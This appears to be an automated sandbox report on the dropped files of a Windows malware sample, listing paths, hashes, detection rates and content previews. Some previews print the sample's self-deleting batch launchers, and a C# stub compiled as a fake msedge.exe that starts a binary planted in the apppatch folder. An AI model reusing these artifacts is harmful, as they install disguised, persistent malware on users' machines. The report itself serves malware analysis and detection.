Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\xDZppRkgYb.bat"

C:\Users\user\AppData\Local\Temp\xSjT0Li0Hv

Download File

Process:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774723
Encrypted:	false
SSDEEP:	3:7WrtKc5t7CiX:AXzH
MD5:	6EDF353D1EC9D28894EF60EA460F50AF
SHA1:	10568B85CB566F20C08663409EF3712B8C6F7A04
SHA-256:	090006A5B755F01AEC81926EC2184F3AC5D0E4E4FCAAB582E9D2F7C6C060AD68
SHA-512:	29563FF908E2E7BB8B6FDA0DB9250743EB2101D2C84AF224DDA0C4725ED0C9188EFF38CB138981BDDFA46F9DFE2F13069BAF0BEE3AC6F5862686AE344350CC92
Malicious:	false
Preview:	a7sNHeJ4epdN0dCkH7cBlg2Wr

C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.0.cs

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	435
Entropy (8bit):	5.050755689079016
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6L/2nBLiFkD:JNVQIbSfhWLzIiFkMSfhWLnFkD
MD5:	1D69F9916C97513A119C6518CA1B9D76
SHA1:	0D46C8BF34AD78C50F76EB74C509CCC982188769
SHA-256:	969B236DDEB59B8A1447E164AAFED832ECC5EDB8294B83550E35B6A4BD1D7E44
SHA-512:	C753591ED071F13C1F7524267722FC1049F5C265158C9D16DB9B04836FA33CCA667A7EC076A7350F974574AB5B10CB8EC6AF55B14DDB74B1F0A43630705FE95F
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\jdownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	264
Entropy (8bit):	5.125813344263666
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oqLTwi23fBT5n:Hu7L//TRRzscQawZF5n
MD5:	DDC006B06072E94EDB077459C274CB8D
SHA1:	7C3BA8459034929B467DDD34B0054701F6C89471
SHA-256:	F6A587FD3D17B86422BBCA844DBCF889DD11CADBF81CDE62B4A848CAAD14F0A3
SHA-512:	494D36DFA4F8903A0657EE9E3BA81F6ECD339866A845044616B548B09EF91D32131EB724B8DDABC448287A48F917D685C83FA61784DDD19A49A96105CDFCE816
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.0.cs"

C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.out

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (342), with CRLF, CR line terminators
Category:	modified
Size (bytes):	763
Entropy (8bit):	5.255673655489578
Encrypted:	false
SSDEEP:	12:Km/I/u7L//TRRzscQawZF5uKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:K8I/un/VRzstawZF8Kax5DqBVKVrdFAw
MD5:	9C534DDCA7BE7D9B9462C648ECB77A5F
SHA1:	08B96B29B79B5D1E2D4F508FA3F73CA09010B3F6
SHA-256:	7725C248E3928DF990B10F68A9457BD3EB56F80A0600DDC6F43908D23A804D10
SHA-512:	ED713651BE7227EE68DE77E349F4E9B1D596B6E4B741CC0CE8D46CE99A7830DE242B038B43ECB40D4B23627ADFEE4E66C7A93BC81B8923AA29C4CF71343081CE
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\yC86nPihDu.bat

Download File

Process:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	232
Entropy (8bit):	5.224474017414505
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEzSNGhBHNSKOZG1qLTwi23fBR4H:HTg9uYDEzSN+B6wZ+
MD5:	CDE1CD684562E959C732A15841E8DE2C
SHA1:	91E31D2EADF95FD8728AEB95C90E32882729F7E4
SHA-256:	CAC9A3DDFC704CF78EB67A74C6C1573C62B8B4B412D49D97FBA4E1379C83BEC4
SHA-512:	31F7B767DDC8AED5048E3718552A4C88288C56DD0357B59FE6659F9A0F266B1A3198793F595C35220350F1996617BBE265124DDCD54AAF392B67DD46C2495E79
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\yC86nPihDu.bat"

C:\Users\user\Desktop\BazpdGXT.log

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\LfwFFKlf.log

Download File

Process:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\LwOexCEJ.log

Download File

Process:	C:\Program Files\Internet Explorer\images\dwm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\LzBDVIdW.log

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NpAnHTXs.log

Download File

Process:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UOGmotWX.log

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZdtVejrZ.log

Download File

Process:	C:\Program Files\Internet Explorer\images\dwm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZmWTGheo.log

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\e755c7a4f7e920

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with very long lines (733), with no line terminators
Category:	dropped
Size (bytes):	733
Entropy (8bit):	5.8995470138668225
Encrypted:	false
SSDEEP:	12:1XiG4n7+OvXdF0FzJ8FNVVsn+TyBTXdlWGMm63kqR0hzbhaMBBNTPkBV:1PA+Ov+0DVQ+TypdT63kNpQMBkV
MD5:	0484F86B16313FA9F4B4126770CBB8FE
SHA1:	02BB59F68CD0F302C2D9D8A05B92A7F4FC8A25A5
SHA-256:	12FE42C677F9563CEBCBE04906365E2275676D7EE71CAA08C11907F1CE3DFA08
SHA-512:	3D47AE28524CDE4BEF90BCD72F9F81E146B08CA693D5A8D351CAD87ECCA3ED776CFFC6E1EC56416ADF48D528C5BFD34DFD9A8F266BCF1EE3B5B468E29C77CBA5
Malicious:	false
Preview:	IaJro6piqAFuLwsLESMmsn0zsIsi9ouLVajBrSCX6wbix5iO58GAwBAekU9gOGiBQ3YuMqewQzp6MRBwkdmBhuYTaEbXSgJzOZS3gxBPeUu7VESSSM5udhegfFUIPHetq0rx9IQwbXgNAa8VwIEFkYVr5vYbd39X0ARfWfSK6JSGAQgEG8WGCYJReA1NtySiXJX9Ic9R04JbFPqoPTUfh3Vb1ABVnFaH0us03g5n9FQHPrMOTN7adxAey5IIbnnueBkUh0vtXrgcnOMJxwCZH9nDtOC8YwMVbfmNH1qdcOCwRi0ks8VolOnfXhkTywUlfKBHl8C6Gi7270wLXbPZbhuN1H0jQXpp3bRGhs8t6YiCQvhgvZ5Wh5J7ZxQeIcps3R8fjpnodfdC8s6FjTy0cSI8RTrtcdldt0I8xB7FwQ2BbG9r1K5znyQkJ9NP83M94ATIj7ShVtELaGhLU92Sivz4kiyxxsH2E2Hbx0H31Xd4uEKDcC48B3bIKYiBJfunlMGh9FXd29aKR4KfXvUuxJ1Lb8QYSGuVn0Ti8nEXpaGCdQ1QOCnYL9zcU5FAz8LvPEhblmguq7FXCyrKHAKPcVKoA0NDhDhqPUxYtZomg3rO3cZgN43zy5S343buYdMmZZHrBTbrVitjo5vhbrznKs2UC3d074NDqEydUre4cLdPLsP8H3TrnjcqhxpIzlubVq2jGRMtN5K8PmIToesDlfZHmI6hC

C:\Users\user\Desktop\xQYgnzsS.log

Download File

Process:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	2464
Entropy (8bit):	3.247938434906902
Encrypted:	false
SSDEEP:	24:QOaqdmuF3r6V+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxN:FaqdF76V+AAHdKoqKFxcxkF0P
MD5:	2AF04A01602394D139E3E2A7E0395A13
SHA1:	5ADB46398E5D295F76BCD7C93D627312181DA4BD
SHA-256:	1FC121894725984A4E61922E1A59357B5916AEB11D4DB1319A54D6B628C31847
SHA-512:	45D1B690AAD5278B794059D89087F91DA1F1CED111B25FE6492E2FA14D470AFC04F4FBEF076AB4504C9282D68D0C331AF70B81F966E343F819862CE71038DDB6
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. M.o.n. .. J.a.n. .. 1.3. .. 2.0.2.5. .0.7.:.3.3.:.5.1.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e........................................ .W.S.C. .S.t.a.t.e. .I.n.f.o. ................................................................. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. ..............................d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

C:\Windows\System32\CSCEE8385358E3E4E5C92A1AE5417196AA8.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.995230094322275
Encrypted:	false
SSDEEP:	48:65prPt0qM7Jt8Bs3FJsdcV4MKe27/dMAcvqBHOOulajfqXSfbNtm:4PG3Pc+Vx9MiDvkocjRzNt
MD5:	07CBF8DDD7C707858C544D7504EC28B3
SHA1:	FDFFE2F34F06969EE9087EC448ACB2FCF4CA06FF
SHA-256:	6BE80A315BC9C9609E947BE6609980902B8AC8CB5F1E1B53251325787005C810
SHA-512:	01BD5106B21E1CF51C4A742D590E0304244BC04FEE37D32B852F6900526B9C50EBE81A5193D6776C3017036FD2058E4F28CA0DDEB3C8EB64FE0B161786486099
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@..................................'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..d.............................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.4.......#GUID...D... ...#Blob...........WU........%3................................................................

C:\Windows\apppatch\en-US\ed3206c147f2f1

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with very long lines (497), with no line terminators
Category:	dropped
Size (bytes):	497
Entropy (8bit):	5.864232828224111
Encrypted:	false
SSDEEP:	12:BDWib8KkzB1ALPdPG8AbzkZE2kxrBQAQR4qHLqpbon:BDad+LdGRzz2kxrBQKnmn
MD5:	6C52937F680828560DC757FF10823899
SHA1:	8E6C9E81AC1F4C602A9F3BFA2E1143CC7D80387B
SHA-256:	631E8CC322E7943BDBAFC69C00E7BE8FAF608074A9DCCCF6E602BA769ECB999C
SHA-512:	B3B2E03BA1844E9066D2BEEB17BA22BC7835ABF327A9ECB7659388A28A08DCC41837734CEACA8836DC54BC620992181D38FAB75F646292929A9BA8CDEAB89B12
Malicious:	false
Preview:	0p2zrjerYeb4oVdU3qzzQv78Vpr10TgNsod9m2WBBssHqB2q2v7uMENEs3eB2n1F7OLA2erATyyiCzSTxA8EWwAoaYQtYVJY0nKb01yYD6bXQpC2lKN1owtLNhkdN8m8pZrZo0d5MjBZUnXvWXHNHRtE39OTRULFTcs07mOurRpEvT0kJyHz0Y1XqnfplKo2Y5F24hxtJWgzmoTkJnJcNVP5kVKUHiJhnwqzN7pmAXpd2CvBU5g8ALoCpKSjWdllN9Lz8dWL8hczqwDijI9MCLgbHnJDpGPgvEP205D1iV9dtzW3Ht9OdZjCcurVTTg1R5DmgKroEInrLDrSQQ55GBDWeMaGOshPyILywuX7CVJUv21YCZECYkuQ2rHUtlZWkY2C13gg383v1skmUBDynf1OX56FmCNb5wuXAzgJ3iJZr9ZJGe9shltFhno66a30uczE8Mmfe45FVbhYfw8IDf3UDo0WKjMcoTpPKUL32dNmpnuGG

C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1685504
Entropy (8bit):	7.44326681578664
Encrypted:	false
SSDEEP:	24576:Dl2UpmjCMYU6XtQCBRSybXZgRRNsSSzUcYUHcAtRTjeXRE7QSvMllsWH4Xsmnobb:BdtdQCBRZX3HYUPtRTjmcQSTWH4Xshb
MD5:	13A9FE232C423531F428E7EBF5BCC3CE
SHA1:	7940D3296D943F8F54E6D2E58982812DE6F66A79
SHA-256:	3E60AC6AC6C4FC9F90B87DDE23D1261AC236782DE1B00CCA97BDF950019EE3A3
SHA-512:	ED6F68B31F034C49B6EF9A79A793D5BA46D6A8CFFCA33F1F5CDBB3DB51AC6AE9EA5AA39EA7DEDE138C832B2A47C9F484441F549B163254BDBF5566A4590042F5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
